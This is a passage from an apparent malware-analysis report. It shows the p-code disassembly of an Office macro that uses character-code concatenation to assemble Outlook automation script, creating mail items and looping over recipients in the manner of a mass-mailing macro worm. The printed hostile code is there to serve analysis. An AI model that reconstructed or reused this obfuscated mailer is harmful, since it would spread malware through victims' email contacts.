' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004A
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0043
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #47:
' Line #48:
' Ld kackfun1
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0028
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004F
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0055
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #49:
' Ld kackfun1
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x004C
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004F
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004F
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004B
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x002E
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0050
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #50:
' Line #51:
' Ld kackfun1
' LitDI2 0x0050
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x004C
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0049
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0043
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #52:
' Ld kackfun1
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0049
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004F
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004E
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0029
' ArgsLd Chr 0x0001
' Concat
' Ld vbCrLf
' Concat
' LitDI2 0x0053
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #53:
' Line #54:
' Ld kackfun1
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004E
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0057
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004D
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0049
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004C
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x003D
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #55:
' Line #56:
' Ld kackfun1
' LitDI2 0x004F
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0055
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #57:
' Ld kackfun1
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0050
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0050
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x002E
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0043
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0052
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #58:
' Line #59:
' Ld kackfun1
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0049
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004D
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0028
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0030
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0029
' ArgsLd Chr 0x0001
' Concat
' Ld vbCrLf
' Concat
' LitDI2 0x0046
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #60:
' Line #61:
' Ld kackfun1
' LitDI2 0x004F
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0052
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0053
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x005F
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #62:
' Ld kackfun1
' LitDI2 0x004D
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0049
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004C
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0053
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x003D
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #63:
' Line #64:
' Ld kackfun1
' LitDI2 0x0031
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004F
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0032
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0037
' ArgsLd Chr 0x0001
' Ld vbCrLf
' Add
' Concat
' St kackfun1
' Line #65:
' Ld kackfun1
' LitDI2 0x0053
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004D
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0055
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0048
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #66:
' Line #67:
' Ld kackfun1
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x003D
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004F
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0055
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #68:
' Ld kackfun1
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0050
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0050
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x002E
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0047
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #69:
' Line #70:
' Ld kackfun1
' LitDI2 0x004E
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004D
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.